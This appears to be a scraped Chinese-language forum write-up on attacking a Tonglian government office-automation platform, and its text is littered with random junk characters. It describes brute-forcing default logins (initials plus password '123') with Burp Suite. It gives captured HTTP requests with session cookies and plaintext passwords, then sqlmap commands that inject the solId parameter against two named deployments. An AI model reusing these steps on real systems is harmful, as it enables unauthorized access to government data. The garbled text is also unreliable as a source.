' q$ m* d% X; c$ _' F- W m4 z + N) _8 H, \; w9 p1 q
7 p& T3 H; f$ `2 l& `. F6 Z
* z. r" u: q: C& J% F
平台简介:
* _& H2 D3 H5 N3 h7 `
# R% {8 f( b- t8 I5 U3 e# L9 q/ F8 W+ `1 L
$ s: j& }6 r9 I* E! Q; @% i
9 u6 D+ U# P. ~0 ?2 ]. U3 s' C9 x* E
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
' K1 B$ F- O. Y, a* ?7 i, j9 V2 A+ I同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 8 Y- B$ U% G6 G9 ]+ ?+ j9 M2 z2 Y: l
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!5 S% V- J: P, q- a, r% M- U& b
9 W; z0 B* M2 |5 n7 g2 |2 @4 e6 B% t3 M1 K$ W
, x. a; R: J, v 1 |7 s% |! L2 t- O
. X, q. e2 t( \! A' R y7 v
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
& \8 W: p o2 L: e2 t/ n : W: e# O2 @* `7 J
0 ~9 c) m8 h9 y* P" L
- F; J& G3 [! r) Y2 C9 I$ o9 B
/ _7 s# w9 y! J6 H |" k1 q# K* b4 O: ~: [
http://1.1.1.1:7197/cap-aco/#(案例2-)
U/ S! ]: ~: j4 m9 t: R 2 h$ O5 z: p5 K6 _% w- H
" S' s. X8 Y! G X; \7 d; N- i) Y
http://www.XXOO.com (案例1-官网网站)
) A8 J9 G; ?6 _ g1 I2 X, U# G
" \/ p9 S; N) ^, h# Z+ g1 q6 O: e4 t9 O Q( q* G s4 o/ A" L: z
( u" B1 x' _8 [, `2 d& @/ v) I/ f: @& E . a/ \ _! w8 X B1 t
6 m+ w9 {: C7 ~
漏洞详情:
' ~( ~" R1 X% [! {5 I; R* c
% N4 `1 X2 w% ~1 ]- p4 Z" [/ e5 Z/ }4 v0 W3 S% s
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试5 a0 R& y$ D" @
/ n! C: d4 D& I8 D, V3 m( A8 D- J! a; y8 F
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
$ J1 |+ P$ X3 ]# G$ e1 a u( u: M
! h: E- g& O8 R+ p2 U! Y3 I0 Z! R3 N. A. N7 w
' Y2 m) G, S- w9 [ E& s8 S ! K2 Q. V0 ]* T9 Q
" W0 a. c1 I3 b% c6 }' I! Y( _# K5 Q% ^ 2 N. g% P, N7 \' A2 w6 _* w3 P. {
8 M) `: V" [& D0 o, F1 q1 }& B+ _, w9 L" ?' m( A0 y9 Y
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:8 r$ d; ^" }5 Y' R+ D
. `4 Q3 ?3 e! `' t2 @+ h T6 v9 U
0 D: y5 I+ q9 }, ]
1、案例1-官方网站
# u! i2 n W. f* J- v
/ ?* g D. j/ g l( z
; }% L( Z: p9 x GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
% k+ t: T% I; x) D) `" q2 Q 1 m4 N T9 C0 k& V# V$ V' N
9 q$ q# P& ~ h0 A) m% u Host: www.XXOO.com
$ W; X. \3 M2 P e. F, q 8 e6 `5 }# H1 Y( U t
0 K/ a5 x4 K" K2 s
Proxy-Connection: Keep-Alive. N* P9 h* N$ A7 `3 Q* }" s
0 c P* Y3 u7 B" u) w
@- x% i( j! ^# e6 j! O" T! t0 x* A* J$ Y Accept: application/json, text/javascript, */*; q=0.01! X" q' s) X% @, N: y: N ]1 H
$ K' n8 r9 `- }4 V$ [
/ A. o6 z4 q, t2 E
Accept-Language: zh-CN5 W5 \) a6 [% l# a4 S- \, k! W; C% i
! a) ?# j/ \" T! @
) S3 w2 n& L: {8 j% C Content-Type: application/json
- i% z/ @2 V% H K" h! p1 B
1 I2 \. s& D$ T- W; F9 k0 S5 Q" v& u$ Y- I: C
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko- l0 N4 X$ f' k9 B
# @1 `' s5 p- X; p
) ~' f" O1 n, p. R X-Requested-With: XMLHttpRequest- d1 c" v" l8 l% r7 Z+ \
" H* f0 x, i1 |1 ~3 Z; p# d8 n; r) d. m7 w+ g/ S8 B
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
3 Q8 k; X! `4 H w& j" [
. x+ z5 F4 H# ]3 M' s, {3 M2 U5 ~9 c2 z* e8 V1 v4 D
Accept-Encoding: gzip, deflate, sdch( l+ h! p* C8 w+ \ x3 B
$ U9 f0 H2 T8 @0 U; w. e4 j; X8 |/ J# U' L G
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e# D8 `$ q8 [: L/ W
% m p$ ~% Z. _* ^
, e" l! ?0 Z2 g/ ^ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
! n( p- H: }* { 4 R+ g& H& ?' U0 V; I. E
- B' E1 A( ~7 ?9 Z, Z, t: S* ]
9 d9 S: M. Z/ P) k* K
$ I: g4 [# h0 }
: N" p# @$ R) `: k' d
$ f2 e% e6 C% E6 Y
4 R3 O1 ^ w$ r# K$ X, v' S' o
2 }8 j# u1 y$ ?( H( @ 3 d- K- c5 u, t5 i/ W/ {
3 w" p; Z- S2 H6 P; H
4 b! {( {; R2 L
4 T7 f" [( L5 x4 I; `2 U/ G4 k / Q! d8 d2 d: k
. ]$ g) E, |* V/ ]9 a; W$ `
- O# [, A+ x7 `" t- O
: C) {- T5 P1 y6 G# q) S D/ u$ L8 [+ a K7 u; M0 g
2、案例2-某天河云平台# S6 K5 h; X5 t
/ {6 A5 `& N9 V; O& l1 r' r' T: |8 `: l$ A0 c, I
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
, \2 `. N( `9 N3 U& I* o - T, b7 u# s: L u& F M4 K
5 ?3 ?5 X( i: M, ~+ {: y Host: 1.1.1.:71973 p! Y/ t$ ?# H/ m1 p
' {4 v9 w; s5 T% O9 h% S3 h. w- `; ?' y' k
Accept: application/json, text/javascript, */*; q=0.01
0 b4 `' Q3 G. E1 l, P2 J ' p* \% S1 K' V. i
+ p9 ]( Y- K, f- v, n1 I
X-Requested-With: XMLHttpRequest5 A5 D. e6 C- R% o
* u" d0 @! R3 M; D
! D5 b; Z8 H p* d. m- @ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.00 d7 z9 t4 r' `& q: y8 I9 [
( E5 ^* ~! `8 i4 x# p" J
: j: v# M- a$ `3 q+ g, ^ Content-Type: application/json
6 ~4 I. v) v% S* {& a9 O. a7 ]
7 ?# }' ?; F6 ~; T/ g e5 p3 k) ^
" G0 Q9 S4 X3 w) ^( w0 [1 G Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
. S( B1 T0 y) a$ D8 o+ k% z
- Y% S* G8 J7 ]/ f# j" R1 Z# a0 l3 \9 H# D% d$ `, K
Accept-Language: zh-CN,zh;q=0.8
: p" r3 b8 m8 _4 m . ^* ^# V6 {2 I O7 w j
! U' }8 d' y9 B/ W1 q$ ?
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1' T* G4 c4 E9 c3 w3 [2 p0 s
. c& }! ~ b- s/ S4 x7 w2 v( n( s" g8 F" J& X& I
Connection: close) E# Q1 q) J8 l* ^& S2 s
* |# e7 b: ~$ y& `
U% Q2 c) w2 z+ u 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
7 v3 T5 A! t- w9 |6 S
7 m( l5 [- s" n p) @. e
) M, g; v8 X8 @4 { : U c9 a; m0 z0 y$ |8 i$ i6 @2 D
e( G- |% F) |
0 I$ Y6 M( r& L: n+ Z0 }
# h, k2 {3 H6 d& w |